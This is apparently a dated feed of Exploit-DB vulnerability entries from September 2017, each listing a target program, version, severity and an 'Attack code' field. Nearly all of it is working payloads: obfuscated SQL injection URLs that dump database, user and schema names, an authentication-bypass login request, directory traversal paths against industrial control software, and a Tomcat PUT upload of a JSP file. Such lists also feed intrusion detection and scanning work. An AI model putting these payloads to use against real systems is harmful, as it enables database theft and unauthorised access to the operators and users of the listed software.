2017-09-13 | EDB 42674 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: ICAutosales 2.2 - SQL Injection vulnerability
Attack code:
  /index.php?cmd=advertise_details&category=car&aid=1%20and%201=1--
Target program: ICAutosales
Target environment: ICAutosales 2.2

2017-09-13 | EDB 42673 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: ICDutchAuction 1.2 - SQL Injection vulnerability
Attack code:
  /admin/viewuserips.php?id=1%20and%201=1--
Target program: ICDutchAuction
Target environment: ICDutchAuction 1.2

2017-09-13 | EDB 42672 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: ICRestaurant software 1.4 - 'key' Parameter SQL Injection vulnerability
Attack code:
  /index.php?page=static_pages&key=1%20and%201=1--
Target program: ICRestaurant software
Target environment: ICRestaurant software 1.4

2017-09-13 | EDB 42671 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: ICDoctor Appointment 1.3 - 'key' Parameter SQL Injection vulnerability
Attack code:
  /index.php?page=static_pages&key=1%20and%201=1--
Target program: ICDoctor Appointment
Target environment: ICDoctor Appointment 1.3

2017-09-13 | EDB 42670 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: ICAuction 2.2 - 'id' Parameter SQL Injection vulnerability
Attack code:
  /item.php?id=1%20and%201=1--
Target program: ICAuction
Target environment: ICAuction 2.2

2017-09-13 | EDB 42669 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: ICHotelReservation 3.3 - 'key' Parameter SQL Injection vulnerability
Attack code:
  /index.php?page=static_pages&key=1%20and%201=1--
Target program: ICHotelReservation
Target environment: ICHotelReservation 3.3

2017-09-13 | EDB 42668 | SQL Injection | Difficulty: High | Severity: Urgent response required
Vulnerability name: ICMLM 2.1 - 'key' Parameter SQL Injection vulnerability
Attack code:
  /index.php?page=static_pages&key='+/*!00007uNiOn*/+/*!00007SelEct*/+0x283129,0x283229,0x3c68313e496873616e2053656e63616e3c2f68313e,(/*!50000Select*/+export_set(5,@:=0,(/*!50000select*/+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!50000table_name*/,0x3c6c693e,2),/*!50000column_name*/,0xa3a,2)),@,2))--
Target program: ICMLM
Target environment: ICMLM 2.1

2017-09-13 | EDB 42667 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: ICLowBidAuction 3.3 - SQL Injection vulnerability
Attack code:
  /admin/editadminuser.php?id=1%20and%201=1--
Target program: ICLowBidAuction
Target environment: ICLowBidAuction 3.3

2017-09-13 | EDB 42706 | Directory Traversal | Difficulty: High | Severity: Medium
Vulnerability name: Carel PlantVisor 2.4.4 - Directory Traversal vulnerability
Attack code:
  /..%5c/..%5c/..%5c/..%5c/..%5c/..%5ctest.txt
Target program: Carel PlantVisor
Target environment: Carel PlantVisor 2.4.4

2017-09-13 | EDB 42705 | Directory Traversal | Difficulty: Easy | Severity: Medium
Vulnerability name: Carlo Gavazzi Powersoft 2.1.1.1 - Directory Traversal vulnerability
Attack code:
  /../../../../../../../../../../../text.txt?res=&valid=true
Target program: Carlo Gavazzi Powersoft
Target environment: Carlo Gavazzi Powersoft 2.1.1.1

2017-09-13 | EDB 42699 | Directory Traversal | Difficulty: Easy | Severity: Medium
Vulnerability name: Indusoft Web Studio - Directory Traversal vulnerability
Attack code:
  /../../../../../../../../../../../text.txt
Target program: Indusoft Web Studio
Target environment: Indusoft Web Studio

2017-09-13 | EDB 42690 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: ICAffiliateTracking 1.1 - SQL Injection vulnerability
Attack code:
  POST /icaffiliatetracking/adminlogin.asp HTTP/1.1
  Host:
  User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7
  Accept: */*
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  user='or 1=1 or ''='&pass='anything'
Target program: ICAffiliateTracking
Target environment: ICAffiliateTracking 1.1

2017-09-14 | EDB 42716 | SQL Injection | Difficulty: High | Severity: Urgent response required
Vulnerability name: Theater Management Script - SQL Injection vulnerability
Attack code:
  /show-time.php?moid=-100'++/*!08888UNION*/(/*!08888SELECT*/0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329)--
Target program: Theater Management Script
Target environment: Theater Management Script

2017-09-14 | EDB 42715 | SQL Injection | Difficulty: High | Severity: Urgent response required
Vulnerability name: PTC KSV1 Script 1.7 - 'type' Parameter SQL Injection vulnerability
Attack code:
  /gpt.php?v=entry&type=+'++aND(/*!00000sELeCT*/+0x30783331+/*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!00000CoNCaT*/((sELEcT(sELECT+/*!00000CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a) AND ''='&id=1&
Target program: PTC KSV1 Script
Target environment: PTC KSV1 Script 1.7

2017-09-14 | EDB 42714 | SQL Injection | Difficulty: High | Severity: Urgent response required
Vulnerability name: Adserver Script 5.6 - SQL Injection vulnerability
Attack code:
  /manage-target.php?id=13-13'+/*!00008union*/+/*!00008select*/++/*!00008CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION())--+-&wap=0
Target program: Adserver Script
Target environment: Adserver Script 5.6

2017-09-14 | EDB 42713 | SQL Injection | Difficulty: High | Severity: Urgent response required
Vulnerability name: Enterprise Edition Payment Processor Script 3.7 - SQL Injection vulnerability
Attack code:
  /products?id=-1++/*!00002UNION*/(/*!00002SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,/*!00002CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()))--+-&action=update
Target program: Enterprise Edition Payment Processor Script
Target environment: Enterprise Edition Payment Processor

2017-09-14 | EDB 42717 | SQL Injection | Difficulty: High | Severity: Urgent response required
Vulnerability name: Justdial Clone Script - 'fid' Parameter SQL Injection vulnerability
Attack code:
  /restaurants-details.php?fid=46'++aND(/*!00000sELeCT*/+0x30783331+/*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!00000CoNCaT*/((sELEcT(sELECT+/*!00000CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a) AND ''='
Target program: Justdial Clone Script
Target environment: Justdial Clone Script

2017-09-15 | EDB 42733 | SQL Injection | Difficulty: High | Severity: Urgent response required
Vulnerability name: PTCEvolution 5.50 - SQL Injection vulnerability
Attack code:
  /index.php?view=products&id=-4++/*!03333UNION*/(/*!03333SELECT*/+(1),(/*!03333Select*/+export_set(5,@:=0,(/*!03333select*/+count(*)/*!03333from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!03333table_name*/,0x3c6c693e,2),/*!03333column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8),(9))--
Target program: PTCEvolution
Target environment: PTCEvolution 5.50

2017-09-15 | EDB 42734 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: Contact Manager 1.0 - 'femail' Parameter SQL Injection vulnerability
Attack code:
  /login.php?forgot=2&femail=1%20and%201=1--
Target program: Contact Manager
Target environment: Contact Manager 1.0

2017-09-20 | EDB 42953 | File Upload | Difficulty: Easy | Severity: High
Vulnerability name: Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - File Upload vulnerability
Attack code:
  PUT /1.jsp/ HTTP/1.1
  Host:
  User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7
  Accept: */*
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  Content-Length: 26
  <% out.println("hello");%>
Target program: Apache Tomcat
Target environment: Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8
